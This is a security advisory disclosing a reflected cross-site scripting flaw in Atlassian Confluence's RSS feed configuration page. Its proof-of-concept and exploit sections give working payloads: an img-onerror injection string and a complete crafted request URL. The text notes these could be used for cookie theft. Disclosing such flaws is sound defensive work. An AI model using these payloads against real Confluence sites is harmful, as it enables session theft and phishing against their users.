Atlassian Confluence 5.3 Cross Site Scripting

Atlassian Confluence, the Enterprise Wiki  Reflected XSS

Details
==============================================================================
Product: Atlassian Confluence 3.5.6 till 5.3(latest version), the Enterprise Wiki 
Security-Risk: Critical
Remote-Exploit: yes
Vendor-URL: http://www.atlassian.com
Advisory-Status: Not Published

Credits
==============================================================================
Discovered by: Muhammad Waqar 

Affected Products:
==============================================================================
Atlassian Confluence 3.5.6, the Enterprise Wiki till latest version Atlassian Confluence 5.3


Description
==============================================================================
It's a wiki. You can use it to collaborate on writing and sharing content with your team.

More Details
==============================================================================
I have discsovered a Reflected Cross site scripting (XSS) inside
Atlassian Confluence, the Enterprise Wiki , 
the vulnerability can be easily exploited and can be used to steal cookies,
perform phishing attacks and other various attacks compromising the security of a
user.

Proof of Concept
==============================================================================
Follow below steps to reproduce:

Navigate to this link http://www.example/dashboard/configurerssfeed.action

Now you see RSS feed creation options

Select any options you want You can see "Advanced Options" click on it and in the input fields put my XSS payload that is
"><img src=x onerror=alert(9);>

Now click on "Create RSS Feed", it will navigate to another page where you see your inserted javascript executed.


Exploit
==============================================================================
Created Feed can be use any where and does not need any sort of authentication so it can be easy for cookie stealing and other attacks.

http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment&
types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys=
&sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed

Note: This exploit works in FireFox/Opera.

Solution
==============================================================================
Input provided by the user is not properly sanitized while posting it so it should be sanitized.


-- 
Regards,
Muhammad Waqar